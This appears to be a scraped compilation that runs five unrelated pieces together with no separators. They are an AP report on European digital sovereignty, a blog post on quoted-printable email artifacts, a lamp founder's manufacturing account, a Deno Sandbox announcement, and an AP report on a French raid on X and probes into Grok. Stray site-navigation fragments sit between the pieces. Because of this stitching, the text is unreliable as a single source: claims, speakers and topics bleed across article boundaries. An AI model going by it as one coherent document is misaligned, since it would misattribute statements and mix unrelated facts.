Add AP News as your pre­ferred source to see more of our sto­ries on Google.

Add AP News as your pre­ferred source to see more of our sto­ries on Google.

LONDON (AP) — In France, civil ser­vants will ditch Zoom and Teams for a home­grown video con­fer­ence sys­tem. Soldiers in Austria are us­ing open source of­fice soft­ware to write re­ports af­ter the mil­i­tary dropped Microsoft Office. Bureaucrats in a German state have also turned to free soft­ware for their ad­min­is­tra­tive work.

Around Europe, gov­ern­ments and in­sti­tu­tions are seek­ing to re­duce their use of dig­i­tal ser­vices from U. S. Big Tech com­pa­nies and turn­ing to do­mes­tic or free al­ter­na­tives. The push for “digital sov­er­eignty” is gain­ing at­ten­tion as the Trump ad­min­is­tra­tion strikes an in­creas­ingly bel­liger­ent pos­ture to­ward the con­ti­nent, high­lighted by re­cent ten­sions over Greenland that in­ten­si­fied fears that Silicon Valley gi­ants could be com­pelled to cut off ac­cess.

Concerns about data pri­vacy and wor­ries that Europe is not do­ing enough to keep up with the United States and Chinese tech lead­er­ship are also fu­el­ing the drive.

The French gov­ern­ment ref­er­enced some of these con­cerns when it an­nounced last week that 2.5 mil­lion civil ser­vants would stop us­ing video con­fer­ence tools from U. S. providers — in­clud­ing Zoom, Microsoft Teams, Webex and GoTo Meeting — by 2027 and switch to Visio, a home­grown ser­vice.

The ob­jec­tive is “to put an end to the use of non-Eu­ro­pean so­lu­tions, to guar­an­tee the se­cu­rity and con­fi­den­tial­ity of pub­lic elec­tronic com­mu­ni­ca­tions by re­ly­ing on a pow­er­ful and sov­er­eign tool,” the an­nounce­ment said.

“We can­not risk hav­ing our sci­en­tific ex­changes, our sen­si­tive data, and our strate­gic in­no­va­tions ex­posed to non-Eu­ro­pean ac­tors,” David Amiel, a civil ser­vice min­is­ter, said in a press re­lease.

Microsoft said it con­tin­ues to “partner closely with the gov­ern­ment in France and re­spect the im­por­tance of se­cu­rity, pri­vacy, and dig­i­tal trust for pub­lic in­sti­tu­tions.”

The com­pany said it is “focused on pro­vid­ing cus­tomers with greater choice, stronger data pro­tec­tion, and re­silient cloud ser­vices — en­sur­ing data stays in Europe, un­der European law, with ro­bust se­cu­rity and pri­vacy pro­tec­tions.”

Zoom, Webex and GoTo Meeting did not re­spond to re­quests for com­ment.

French President Emmanuel Macron has been push­ing dig­i­tal sov­er­eignty for years. But there’s now a lot more “political mo­men­tum be­hind this idea now that we need to de-risk from U. S. tech,” Nick Reiners, se­nior ge­ot­ech­nol­ogy an­a­lyst at the Eurasia Group.

“It feels kind of like there’s a real zeit­geist shift,” Reiners said

It was a hot topic at the World Economic Forum’s an­nual meet­ing of global po­lit­i­cal and busi­ness elites last month in Davos, Switzerland. The European Commission’s of­fi­cial for tech sov­er­eignty, Henna Virkkunen, told an au­di­ence that Europe’s re­liance on oth­ers “can be weaponized against us.”

“That’s why it’s so im­por­tant that we are not de­pen­dent on one coun­try or one com­pany when it comes to very crit­i­cal fields of our econ­omy or so­ci­ety,” she said, with­out nam­ing coun­tries or com­pa­nies.

A de­ci­sive mo­ment came last year when the Trump ad­min­is­tra­tion sanc­tioned the International Criminal Court’s top pros­e­cu­tor af­ter the tri­bunal, based in The Hague, Netherlands, is­sued an ar­rest war­rant for Israeli Prime Minister Benjamin Netanyahu, an ally of President Donald Trump.

The sanc­tions led Microsoft to can­cel Khan’s ICC email, a move that was first re­ported by The Associated Press and sparked fears of a “kill switch” that Big Tech com­pa­nies can use to turn off ser­vice at will.

Microsoft main­tains it kept in touch with the ICC “throughout the process that re­sulted in the dis­con­nec­tion of its sanc­tioned of­fi­cial from Microsoft ser­vices. At no point did Microsoft cease or sus­pend its ser­vices to the ICC.”

Microsoft President Brad Smith has re­peat­edly sought to strengthen trans-At­lantic ties, the com­pa­ny’s press of­fice said, and pointed to an in­ter­view he did last month with CNN in Davos in which he said that jobs, trade and in­vest­ment. as well as se­cu­rity, would be af­fected by a rift over Greenland.

“Europe is the American tech sec­tor’s biggest mar­ket af­ter the United States it­self. It all de­pends on trust. Trust re­quires di­a­logue,” Smith said.

Other in­ci­dents have added to the move­ment. There’s a grow­ing sense that re­peated EU ef­forts to rein in tech gi­ants such as Google with block­buster an­titrust fines and sweep­ing dig­i­tal rule books haven’t done much to curb their dom­i­nance.

Billionaire Elon Musk is also a fac­tor. Officials worry about re­ly­ing on his Starlink satel­lite in­ter­net sys­tem for com­mu­ni­ca­tions in Ukraine.

Washington and Brussels wran­gled for years over data trans­fer agree­ments, trig­gered by for­mer National Security Agency con­trac­tor Edward Snowden’s rev­e­la­tions of U. S. cy­ber-snoop­ing.

With on­line ser­vices now mainly hosted in the cloud through data cen­ters, Europeans fear that their data is vul­ner­a­ble.

U. S. cloud providers have re­sponded by set­ting up so-called “sovereign cloud” op­er­a­tions, with data cen­ters lo­cated in European coun­tries, owned by European en­ti­ties and with phys­i­cal and re­mote ac­cess only for staff who are European Union res­i­dents.

The idea is that “only Europeans can take de­ci­sions so that they can’t be co­erced by the U. S.,” Reiners said.

The German state of Schleswig-Holstein last year mi­grated 44,000 em­ployee in­boxes from Microsoft to an open source email pro­gram. It also switched from Microsoft’s SharePoint file shar­ing sys­tem to Nextcloud, an open source plat­form, and is even con­sid­er­ing re­plac­ing Windows with Linux and tele­phones and video­con­fer­enc­ing with open source sys­tems.

“We want to be­come in­de­pen­dent of large tech com­pa­nies and en­sure dig­i­tal sov­er­eignty,” Digitalization Minister Dirk Schrödter said in an October an­nounce­ment.

The French city of Lyon said last year that it’s de­ploy­ing free of­fice soft­ware to re­place Microsoft. Denmark’s gov­ern­ment and the cities of Copenhagen and Aarhus have also been try­ing out open-source soft­ware.

“We must never make our­selves so de­pen­dent on so few that we can no longer act freely,” Digital Minister Caroline Stage Olsen wrote on LinkedIn last year. “Too much pub­lic dig­i­tal in­fra­struc­ture is cur­rently tied up with very few for­eign sup­pli­ers.”

The Austrian mil­i­tary said it has also switched to LibreOffice, a soft­ware pack­age with word proces­sor, spread­sheet and pre­sen­ta­tion pro­grams that mir­rors Microsoft 365’s Word, Excel and PowerPoint.

The Document Foundation, a non­profit based in Germany that’s be­hind LibreOffice, said the mil­i­tary’s switch “reflects a grow­ing de­mand for in­de­pen­dence from sin­gle ven­dors.” Reports also said the mil­i­tary was con­cerned that Microsoft was mov­ing file stor­age on­line to the cloud — the stan­dard ver­sion of LibreOffice is not cloud-based.

Some Italian cities and re­gions adopted the soft­ware years ago, said Italo Vignoli, a spokesman for The Document Foundation. Back then, the ap­peal was not need­ing to pay for soft­ware li­censes. Now, it’s the main rea­son is to avoid be­ing locked into a pro­pri­etary sys­tem.

“At first, it was: we will save money and by the way, we will get free­dom,” Vignoli said. “Today it is: we will be free and by the way, we will also save some money.”

Associated Press writer Molly Quell in The Hague, Netherlands con­tributed to this re­port.

This ver­sion cor­rects the con­tri­bu­tion line to Molly Quell in­stead of Molly Hague.

What’s up with all those equals signs any­way? IT”S DOING IT AGAIN!! Books on the Site for Magazines About Comics? There are too many plug stan­dards

What’s up with all those equals signs any­way?For some rea­son or other, peo­ple have been post­ing a lot of ex­cerpts from old emails on Twitter over the last few days. The most vi­tal ques­tion every­body’s ask­ing them­selves is: What’s up with all those equals signs?!And that’s some­thing I’m some­what of an ex­pert on. I mean, hav­ing writ­ten mail read­ers and stuff; not be­cause I’ve been to Caribbean is­lands. I’ve seen peo­ple con­fi­dently claim that it’s a code, or that it’s an arte­fact of scan­ning and then us­ing OCR, but it’s nei­ther — it’s just that who­ever con­verted these emails to a read­able for­mat were mo­rons.What’s that you say? “Converted?! Surely emails are just text!!” Well, if you lived in the stone age (i.e., the 80s), they mostly were, but then peo­ple in­vented things like “long lines” and “rock döts”, and com­put­ers had to “encode” the mail be­fore send­ing.The arte­fact we see here is from some­thing called “quoted print­able”, or as we used to call it when it was in­tro­duced: “Quoted un­read­able”.To take the first line. Whoever wrote this, typed in the fol­low­ing in their mail reader:we talked about de­sign­ing a pig with dif­fer­ent non- cloven hoofs in or­der to make kosher ba­conWe see that that’s quite a long line. Mail servers don’t like that, so mail soft­ware will break it into two lines, like so:we talked about de­sign­ing a pig with dif­fer­ent non- =

cloven hoofs in or­der to make kosher ba­con­See? There’s that equals sign! Yes, the equals sign is used to say “this should re­ally be one sin­gle line, but I’ve bro­ken it in two so that the mail server does­n’t get mad at me”.The for­mal de­f­i­n­i­tion here is im­por­tant, though, so I have to be a bit tech­ni­cal here: To say “this is a con­tin­u­a­tion line”, you in­sert an equals sign, then a car­riage re­turn, and then a line feed.=CRLF… non- =CRLF

cloven hoofs…When dis­play­ing this, we re­move all these three char­ac­ters, and end up

with:… non- cloven hoofs…So what’s hap­pened here? Well, who­ever col­lected these emails first con­verted from CRLF (also known as the “Windows” line end­ing cod­ing, but it’s the stan­dard line end­ing in the SMTP stan­dard) to “NL” (i.e., “Unix” line end­ing cod­ing). This is pretty nor­mal if you want to deal with email. But you then have one byte fewer:… non- =NL

cloven hoofs…If your al­go­rithm to de­code this is, stu­pidly, “find equals signs at the end of the line, and then delete two char­ac­ters, and then fi­nally the equals sign”, you should end up with:… non- loven hoofs…I.e., you lose the “c”. That’s al­most what hap­pened here, but not quite: Why does the equals sign still re­main?This StackOverflow post from 14 years ago ex­plains the phe­nom­e­non, sort of:Ob­vi­ously the client no­tices that = is not fol­lowed by a proper CR LF se­quence, so it as­sumes that it is not a soft line break, but a char­ac­ter en­coded in two hex dig­its, there­fore it reads the next two bytes. It should no­tice that the next two bytes are not valid hex dig­its, so its be­hav­ior is wrong too, but we have to ad­mit that at that point it does not have a chance to dis­play some­thing use­ful. They opted for the garbage in, garbage out ap­proach.That is, equals signs are also used for some­thing else be­sides wrap­ping long lines, and that’s what we see later in the post: =C2 please noteIf the equals sign is not at the end of a line, it’s used to en­code “funny char­ac­ters”, like what you use with “rock döts”. =C2 is 194, which is a first char­ac­ter in a UTF-8 se­quence, and the fol­low­ing char is most likely a =A0: =C2=A0 is “non-breakable space”, which is some­thing peo­ple of­ten use to in­dent text (and the “please note” is in­dented) and you see =A0 in many other places in these emails.My guess is that who­ever did this part just did a search-re­place for =C2 and/​or =A0 in­stead of us­ing a proper de­coder, but other ex­pla­na­tions are cer­tainly pos­si­ble. Any ideas?Any­way, that’s what’s up with those equals signs: 1) “it’s tech­ni­cal”, and 2) “it’s a com­bi­na­tion of buggy con­tin­u­a­tion line de­cod­ing and buggy non-ASCII de­cod­ing”, and 3) “whoever processed these mails are in­com­pe­tent”. I don’t think 2) should be very sur­pris­ing at this point, do you?(Edit a bit later: To nit­pick a bit here: When the stan­dard was writ­ten, peo­ple mostly en­vi­sioned that the quoted-print­able con­tent trans­port en­cod­ing would be un­wound upon re­cep­tion (note “transport”), and that you’d end up with “clean text” on disk af­ter re­cep­tion. This did­n’t re­ally hap­pen, so all “real” im­ple­men­ta­tions do the right thing with sin­gle-char­ac­ter (i.e., “unencoded”) new­lines. For in­stance:(quoted-print­able-de­code-string “he=\nllo”)

=> “hello”Which leads me to as­sume that they reused an algo that was usu­ally run in an SMTP server con­text to do the line un­fold­ing — in that con­text, you can safely as­sume that the line end­ing is a CRLF. And by chance, this algo also works fine if you’re work­ing with a Windows-based file, but fails for a Unix-based file.)

1 year ago (Jan 2025) I quit my job as a soft­ware en­gi­neer to launch my first hard­ware prod­uct, Brighter, the world’s bright­est lamp. In March, af­ter $400k in sales through our crowd­fund­ing cam­paign, I had to fig­ure out how to man­u­fac­ture 500 units for our first batch. I had no prior ex­pe­ri­ence in hard­ware; I was count­ing on be­ing able to pick it up quickly with the help of a cou­ple of me­chan­i­cal/​elec­tri­cal/​firmware en­gi­neers.

The prob­lems be­gan im­me­di­ately. I sent our pro­to­type to a test­ing lab to ver­ify the bright­ness and var­i­ous col­orime­try met­rics. The tagline of Brighter was it’s 50,000 lu­mens — 25x brighter than a nor­mal lamp. Instead, de­spite our plan­ning & cal­cu­la­tions, it tested at 39,000 lu­mens caus­ing me to panic (just a lit­tle).

So with all hands on deck, in a cou­ple of weeks we in­creased the power by 20%, re­designed the elec­tron­ics to han­dle more LEDs, in­creased the size of the heatsink to dis­si­pate the ex­tra power, and im­proved the trans­mis­sion of light through the dif­fuser.

This time, we over­shot to 60,000 lu­mens but I’m not com­plain­ing.

Confident in our new de­sign I gave the go ahead to our main con­tract man­u­fac­turer in China to start pro­duc­tion of me­chan­i­cal parts. The heatsink had the longest lead time as it re­quired a mas­sive two ton die cast­ing mold ma­chined over the course of weeks. I planned my first trip to China for when the process would fin­ish.

Simultaneously in April, Trump an­nounced “Liberation Day” tar­iffs, tak­ing the tar­iff rate for the lamp to 50%, promptly climb­ing to 100% then 150% with the en­su­ing trade war. That was the worst pe­riod of my life; I would go to bed lit­er­ally shak­ing with stress. In my opin­ion, Not Cool!

I was ad­vised to press for­ward with man­u­fac­tur­ing be­cause 150% is bonkers and will have to go down. So 2 months later in Zhongshan, China, I’m star­ing at a heatsink that looks com­pletely fucked. Due to a mis­com­mu­ni­ca­tion with the fac­tory, the in­jec­tion pins were moved in­side the heatsink fins, caus­ing the cylin­dri­cal ex­tru­sions be­low. I was just glad at least the fac­tory ex­isted.

I re­turned in August to test the full as­sem­bly with the now cor­rect heatsink. At my elec­tron­ics fac­tory as soon as we con­nect all the wiring, we no­tice the con­trols are com­pletely un­re­spon­sive. By Murphy’s Law (anything that can go wrong will go wrong), I had ex­pected some­thing like this to hap­pen, so I made sure to visit the fac­tory at 10am China Standard time, al­low­ing me to co­or­di­nate with my elec­tri­cal en­gi­neer at 9pm ET and my firmware en­gi­neer at 7:30am IST. We’re mea­sur­ing volt­ages across every part of the lamp and none of it makes sense. I post­pone my next sup­plier visit a cou­ple days so I can get this sorted out. At the end of the day, we fi­nally no­tice the la­bels on two PCB pins were swapped.

With a func­tional fully as­sem­bled lamp, we OK mass pro­duc­tion of the elec­tron­ics.

Our first full pieces from the pro­duc­tion line come out mid October. I air­ship them to San Francisco, and hand de­liver to our first cus­tomers. The rest are sched­uled for con­tainer load­ing end of October.

People like the light! A big SF startup or­ders a lot more. However, there is one is­sue I hear mul­ti­ple times: the knobs are scrap­ing and feel hor­ri­ble. With days un­til the 500 units are loaded into the con­tainer, I fran­ti­cally call with the en­gi­neer­ing team and fac­tory. Obviously this should­n’t be hap­pen­ing, we de­signed a gap be­tween the knobs and the wall to spin freely. After rounds of back and forth and mea­sure­ments, we fig­ure out in the de­sign for man­u­fac­tur­ing (DFM) process, the draw­ings the CNC sub-sup­plier re­ceived did not have the la­bel for spac­ing be­tween the knobs, re­sult­ing in a 0.5mm larger dis­tance than in­tended. Especially com­bined with the white pow­der coat­ing which was thicker than the black fin­ish, this caused some knobs to scrape.

Miraculously, within the re­main­ing days be­fore ship­ment, the fac­tory re­makes & pow­der coats 1000 new knobs that are 1mm smaller in di­am­e­ter.

The fac­tory sends me pho­tos of the con­tainer be­ing loaded. I have 3 weeks un­til the lamps ar­rive in the US — I en­joy the time with­out last minute en­gi­neer­ing prob­lems, al­beit know­ing in­evitably prob­lems will ap­pear again when cus­tomers start get­ting their lamps.

The lamps are processed by our ware­house Monday, Dec 12th, and shipped out di­rectly to cus­tomers via UPS. Starting Wednesday, around ~100 lamps are get­ting de­liv­ered every day. I wake up to 25 cus­tomer sup­port emails and by the time I’m done an­swer­ing them, I get 25 more. The pri­mary is­sue peo­ple have is the bot­tom wires are too short com­pared to the tubes.

It was at this point I truly be­gan to ap­pre­ci­ate Murphy’s law. In my case, any­thing not pre­cisely spec­i­fied and tested would with­out fail go wrong and bite me in the ass. Although we had spec­i­fied the to­tal length of the ca­ble, we did­n’t de­fine the length of ca­ble pro­trud­ing from the base. As such, some as­sem­bly work­ers in the fac­tory put far too much wire in the base of the lamp, not leav­ing enough for it to be as­sem­bled. Luckily cus­tomers were able to fix this by un­screw­ing the base, but far from an ideal ex­pe­ri­ence.

There were other in­stances of qual­ity con­trol where I laughed at the ab­sur­dity: the lamp comes with a sheet of glass that goes over the LEDs, and a screw­driver & screws to at­tach it. For one cus­tomer, the screw­driver com­pletely broke. (First time in my life I’ve seen a bro­ken screw­driver…) For oth­ers, it came dull. The screw­driver sub sup­plier also shipped us two dif­fer­ent types of screws, some of which were per­fect, and oth­ers which were coun­ter­sunk and con­se­quently too short to be ac­tu­ally screwed in.

Coming from soft­ware, the most plan­ning you’re ex­posed to is lin­ear tick­ets, sprints, and set­ting OKRs. If you missed a dead­line, it’s of­ten be­cause you re-pri­or­i­tized, so no harm done.

In hard­ware, the de­vel­op­ment life­cy­cle of a prod­uct is many months. If you mess up tool­ing, or mass pro­duce a part in­cor­rectly, or just sub-op­ti­mally plan, you set back the time­line ap­pre­cia­bly and there’s noth­ing you can do but curse your­self. I found my­self reach­ing for more “old school” plan­ning tools like Gantt charts, and also build­ing my own tools. Make sure you have every step of the process ac­counted for. Assume you’ll go through many it­er­a­tions of the same part; dou­ble your time­lines.

In soft­ware, bud­get­ing is fairly lax, es­pe­cially in the VC funded startup space where all you need to know is your run­way (mainly cal­cu­lated from your em­ployee salaries and cloud costs).

With [profitable] hard­ware busi­nesses, your mar­gin for er­ror is much lower. Literally, your gross mar­gin is lower! If you sell out be­cause you miss a ship­ment or don’t fore­cast de­mand cor­rectly, you lose rev­enue. If you mis-time your in­ven­tory buy­ing, your bank ac­count can eas­ily go neg­a­tive. Accounting is a must, and the more de­tailed the bet­ter. Spreadsheets are your best friend. The fund­ing model is also much dif­fer­ent: in­stead of re­ly­ing heav­ily on eq­uity, most growth is debt-fi­nanced. You have real li­a­bil­i­ties!

Anything that can go wrong will go wrong. Anything you don’t spec­ify will fail to meet the im­plicit spec­i­fi­ca­tion. Any pro­ject or com­po­nent not ac­tively pushed will stall. At pre­vi­ous (software) com­pa­nies I’ve worked at, if some­one fol­lowed up on a task, I took it to mean the task was off track and some­body was to blame. With a hard­ware prod­uct, there are a mil­lion balls in the air and you need to keep track of all of them. Though some­what an­noy­ing, con­stant check­ins sim­ply math-out to be nec­es­sary. The cost of fail­ure or de­lays is too high. Nowadays as a con­tainer gets closer to ship­ment date, I have daily calls with my fac­to­ries. I found my­self agree­ing with a lot of Ben Kuhn’s blog post on run­ning ma­jor pro­jects (his blog post on light­ing was also a ma­jor in­spi­ra­tion for the prod­uct).

When I worked at Meta, every PR had to be ac­com­pa­nied with a test plan. I took that phi­los­o­phy to Brighter, try­ing to rig­or­ously test the out­comes we were aim­ing for (thermals, lu­mens, power, etc…), but I still en­coun­tered sur­pris­ing fail­ures. In soft­ware if you have cov­er­age for a code path, you can feel pretty con­fi­dent about it. Unfortunately hard­ware is al­most the op­po­site of re­peat­able. Blink and you’ll get a dif­fer­ent mea­sure­ment. I’m not an ex­pert, but at this point I’ve ac­cepted the only way to get a sem­blance of con­fi­dence for my met­rics is test­ing on mul­ti­ple units in dif­fer­ent en­vi­ron­ments.

As some­one who gen­er­ally stays out of pol­i­tics, I did­n’t know much about the in­com­ing ad­min­is­tra­tion’s stance to­wards tar­iffs, though I don’t think any­one could have pre­dicted such dras­tic hikes. Regardless, it’s some­thing you should be acutely aware of; take it into con­sid­er­a­tion when de­cid­ing what coun­try to man­u­fac­ture in, make sure it’s in your fi­nan­cial mod­els with room to spare, etc…

I wish I had vis­ited my sup­pli­ers much ear­lier, back when we were still pro­to­typ­ing with them. Price should­n’t be an is­sue — a trip to China is go­ing to be triv­ially cheap com­pared to buy­ing in­ven­tory, even more so com­pared to mess­ing up a man­u­fac­tur­ing run due to mis­com­mu­ni­ca­tion. Most sup­pli­ers don’t get in­ter­na­tional vis­i­tors of­ten, es­pe­cially Americans. Appearing in per­son con­veys se­ri­ous­ness, and I found it greatly im­proved com­mu­ni­ca­tion ba­si­cally im­me­di­ately af­ter my first visit. Plus China is very dif­fer­ent from the US and it’s cool to see!

To me, this process has felt like an ex­er­cise in mak­ing mis­takes and learn­ing painful lessons. However, I think I did do a cou­ple of key things right:

The first thing I did be­fore start­ing man­u­fac­tur­ing—and even be­fore the crowd­fund­ing cam­paign—was set­ting up a sim­ple web­site where peo­ple could pay $10 to get a steep dis­count off the MSRP. Before I com­mit­ted time and money, I needed to know this would be self-sus­tain­ing from the get go. It turns out that peo­ple were happy to give their email and put down a de­posit, even when the only prod­uct pho­tos I had were from a ren­der artist on fiverr!

From talk­ing to other hard­ware founders, these kinds of mis­takes hap­pen to every­one; hard­ware is hard as they say. It’s im­por­tant to have a healthy enough busi­ness model to stom­ach these mis­takes and still be able to grow.

Coolest Cooler had an in­cred­i­bly suc­cess­ful crowd­fund­ing cam­paign, partly be­cause they packed a lot of fea­tures into a very at­trac­tively priced prod­uct. Unfortunately, it was too at­trac­tively priced, and part­way through man­u­fac­tur­ing they re­al­ized they did­n’t have enough money to ac­tu­ally de­liver all the units, lead­ing to a slow and painful bank­ruptcy.

When the first 500 units were be­ing de­liv­ered, I knew there were bound to be is­sues. For that first week, I was lit­er­ally chron­i­cally on my gmail. I would try to re­spond to every cus­tomer sup­port is­sue within 1-2 min­utes if pos­si­ble (it was not con­ducive to my sleep that many of our cus­tomers were in the EU).

Some cus­tomers still had some is­sues with the con­trol tube knobs & firmware. I ac­knowl­edged that they were sub­par and de­cided to re-make the full batch of con­trol tubes prop­erly (with the cor­rect knob spac­ing), as well as up­dated firmware & other im­prove­ments, and ship them to cus­tomers free of charge.

Overall, it’s been a very dif­fer­ent but in­cred­i­bly re­ward­ing ex­pe­ri­ence com­pared to work­ing as a soft­ware en­gi­neer. It’s so cool to see some­thing I built in my friends houses, and equally cool when peo­ple leave com­pletely un­prompted re­views:

Over the past year, we’ve seen a shift in what Deno Deploy cus­tomers are build­ing: plat­forms where users gen­er­ate code with LLMs, and that code runs im­me­di­ately with­out re­view. That code fre­quently calls LLMs it­self, which means it needs API keys and net­work ac­cess.

This is­n’t the tra­di­tional “run un­trusted plu­g­ins” prob­lem. It’s deeper: LLM-generated code, call­ing ex­ter­nal APIs with real cre­den­tials, with­out hu­man re­view. Sandboxing the com­pute is­n’t enough. You need to con­trol net­work egress and pro­tect se­crets from ex­fil­tra­tion.

Deno Sandbox pro­vides both. And when the code is ready, you can de­ploy it di­rectly to Deno Deploy with­out re­build­ing.

You don’t want to run un­trusted code (generated by your LLMs, your users LLMs, or even hand writ­ten by users) di­rectly on your server. It will com­pro­mise your sys­tem, steal your API keys, and call out to evil.com. You need iso­la­tion.

Deno Sandbox gives you light­weight Linux mi­croVMs (running in the Deno Deploy cloud) to run un­trusted code with de­fense-in-depth se­cu­rity. You cre­ate or pro­gram­mat­i­cally via our JavaScript or Python SDKs, and they boot in un­der a sec­ond. You can also in­ter­act with them via SSH, HTTP, or even open a VS Code win­dow di­rectly into the sand­box.

im­port { Sandbox } from “@deno/sandbox”;

await us­ing sand­box = await Sandbox.create();

await sand­box.sh`ls -lh /`;

But there is more. In Deno Sandbox, se­crets never en­ter the en­vi­ron­ment. Code sees only a place­holder:

im­port { Sandbox } from “@deno/sandbox”;

await us­ing sand­box = await Sandbox.create({

se­crets: {

OPENAI_API_KEY: {

hosts: [“api.openai.com”],

value: process.env.OPE­NAI_API_KEY,

await sand­box.sh`echo $OPENAI_API_KEY`;

// DENO_SECRET_PLACEHOLDER_b14043a2f578cba75ebe04791e8e2c7d4002fd0c1f825e19…

The real key ma­te­ri­al­izes only when the sand­box makes an out­bound re­quest to an ap­proved host. If prompt-in­jected code tries to ex­fil­trate that place­holder to

evil.com? Useless.

You can also re­strict which hosts the sand­box can talk to:

await us­ing sand­box = await Sandbox.create({

al­lowNet: [“api.openai.com”, “*.anthropic.com”],

Any re­quest to an un­listed host gets blocked at the VM bound­ary.

Both fea­tures are im­ple­mented via an out­bound proxy sim­i­lar to

coder/​http­jail. This gives us a choke­point for pol­icy en­force­ment. We plan to add more ca­pa­bil­i­ties here: an­a­lyt­ics for out­bound con­nec­tions and pro­gram­matic hooks for trusted code to in­spect or mod­ify re­quests.

If you’re run­ning un­trusted JavaScript or TypeScript, com­bine this with Deno’s

–allow-net flag for de­fense in depth: VM-level net­work re­stric­tions plus run­time-level per­mis­sions.

sand­box.de­ploy() de­ploys code from your sand­box di­rectly to Deno Deploy.

const build = await sand­box.de­ploy(“my-app”, {

pro­duc­tion: true,

build: { mode: “none”, en­try­point: “server.ts” },

const re­vi­sion = await build.done;

con­sole.log(re­vi­sion.url);

One call to go from sand­box to pro­duc­tion de­ploy­ment. No re­build­ing in a dif­fer­ent CI sys­tem, no re-au­then­ti­cat­ing with a dif­fer­ent tool. Just turn your dev en­vi­ron­ment di­rectly into a pro­duc­tion ready, auto-scal­ing server­less de­ploy­ment.

Sandboxes are ephemeral by de­fault, but when you need state we have you cov­ered:

Run apt-get in­stall once, snap­shot it, and every fu­ture sand­box boots with every­thing al­ready in­stalled. Create read-write vol­umes from the snap­shots to cre­ate a fresh de­vel­op­ment en­vi­ron­ment in sec­onds.

Deno Sandbox is in­cluded in your Deno Deploy plan with com­pet­i­tive, us­age-based pric­ing. You pay for com­pute time, not wall-clock time.

We’re ex­cited to see what you (or your AI agents) build with Deno Sandbox.

Add AP News as your pre­ferred source to see more of our sto­ries on Google.

Add AP News as your pre­ferred source to see more of our sto­ries on Google.

PARIS (AP) — French pros­e­cu­tors raided the of­fices of so­cial me­dia plat­form X on Tuesday as part of a pre­lim­i­nary in­ves­ti­ga­tion into al­le­ga­tions that in­clude spread­ing child sex­ual abuse im­ages and deep­fakes. They have also sum­moned bil­lion­aire owner Elon Musk for ques­tion­ing.

X and Musk’s ar­ti­fi­cial in­tel­li­gence com­pany xAI also face in­ten­si­fy­ing scrutiny from Britain’s data pri­vacy reg­u­la­tor, which opened for­mal in­ves­ti­ga­tions into how they han­dled per­sonal data when they de­vel­oped and de­ployed Musk’s ar­ti­fi­cial in­tel­li­gence chat­bot Grok.

Grok, which was built by xAI and is avail­able through X, sparked global out­rage last month af­ter it pumped out a tor­rent of sex­u­al­ized non­con­sen­sual deep­fake im­ages in re­sponse to re­quests from X users.

The French in­ves­ti­ga­tion was opened in January last year by the pros­e­cu­tors’ cy­ber­crime unit, the Paris pros­e­cu­tors’ of­fice said in a state­ment. It’s look­ing into al­leged “complicity” in pos­sess­ing and spread­ing porno­graphic im­ages of mi­nors, sex­u­ally ex­plicit deep­fakes, de­nial of crimes against hu­man­ity and ma­nip­u­la­tion of an au­to­mated data pro­cess­ing sys­tem as part of an or­ga­nized group, among other charges.

Prosecutors asked Musk and for­mer CEO Linda Yaccarino to at­tend “voluntary in­ter­views” on April 20. Employees of X have also been sum­moned that same week to be heard as wit­nesses, the state­ment said. Yaccarino was CEO from May 2023 un­til July 2025.

In a post on its own ser­vice deny­ing the al­le­ga­tions, X railed against the raid on its Paris of­fice as “an abu­sive act of law en­force­ment the­ater de­signed to achieve il­le­git­i­mate po­lit­i­cal ob­jec­tives rather than ad­vance le­git­i­mate law en­force­ment goals rooted in the fair and im­par­tial ad­min­is­tra­tion of jus­tice.”

In a mes­sage posted on X, the Paris pros­e­cu­tors’ of­fice an­nounced the on­go­ing searches at the com­pa­ny’s of­fices in France and said it was leav­ing the plat­form while call­ing on fol­low­ers to join it on other so­cial me­dia.

“At this stage, the con­duct of the in­ves­ti­ga­tion is based on a con­struc­tive ap­proach, with the aim of ul­ti­mately en­sur­ing that the X plat­form com­plies with French law, as it op­er­ates on the na­tional ter­ri­tory,” the pros­e­cu­tors’ state­ment said.

European Union po­lice agency Europol “is sup­port­ing the French au­thor­i­ties in this,” Europol spokesper­son Jan Op Gen Oorth told the AP, with­out elab­o­rat­ing.

French au­thor­i­ties opened their in­ves­ti­ga­tion af­ter re­ports from a French law­maker al­leg­ing that bi­ased al­go­rithms on X likely dis­torted the func­tion­ing of an au­to­mated data pro­cess­ing sys­tem.

It ex­panded af­ter Grok gen­er­ated posts that al­legedly de­nied the Holocaust, a crime in France, and spread sex­u­ally ex­plicit deep­fakes, the state­ment said.

Grok wrote in a widely shared post in French that gas cham­bers at the Auschwitz-Birkenau death camp were de­signed for “disinfection with Zyklon B against ty­phus” rather than for mass mur­der — lan­guage long as­so­ci­ated with Holocaust de­nial.

In later posts on X, the chat­bot re­versed it­self and ac­knowl­edged that its ear­lier re­ply was wrong, say­ing it had been deleted and pointed to his­tor­i­cal ev­i­dence that Zyklon B was used to kill more than 1 mil­lion peo­ple in Auschwitz gas cham­bers.

The chat­bot also ap­peared to praise Adolf Hitler last year, in com­ments that X took down af­ter com­plaints.

In Britain, the Information Commissioner’s Office said it’s look­ing into whether X and xAI fol­lowed the law when pro­cess­ing per­sonal data and whether Grok had any mea­sures in place to pre­vent its use to gen­er­ate “harmful ma­nip­u­lated im­ages.”

“The re­ports about Grok raise deeply trou­bling ques­tions about how peo­ple’s per­sonal data has been used to gen­er­ate in­ti­mate or sex­u­alised im­ages with­out their knowl­edge or con­sent, and whether the nec­es­sary safe­guards were put in place to pre­vent this,” said William Malcolm, an ex­ec­u­tive di­rec­tor at the watch­dog.

He did­n’t spec­ify what the penalty would be if the probe found the com­pa­nies did­n’t com­ply with data pro­tec­tion laws.

A sep­a­rate in­ves­ti­ga­tion into Grok launched last month by the U. K. me­dia reg­u­la­tor, Ofcom, is on­go­ing.

Ofcom said Tuesday it’s still gath­er­ing ev­i­dence and warned the probe could take months.

X has also been un­der pres­sure from the EU. The 27-nation bloc’s ex­ec­u­tive arm opened an in­ves­ti­ga­tion last month af­ter Grok spewed non­con­sen­sual sex­u­al­ized deep­fake im­ages on the plat­form.

Brussels has al­ready hit X with a 120-million euro (then-$140 mil­lion) fine for short­com­ings un­der the bloc’s sweep­ing dig­i­tal reg­u­la­tions, in­clud­ing blue check­marks that broke the rules on “deceptive de­sign prac­tices” that risked ex­pos­ing users to scams and ma­nip­u­la­tion.

On Monday, Musk ’s space ex­plo­ration and rocket busi­ness, SpaceX, an­nounced that it ac­quired xAI in a deal that will also com­bine Grok, X and his satel­lite com­mu­ni­ca­tion com­pany Starlink.

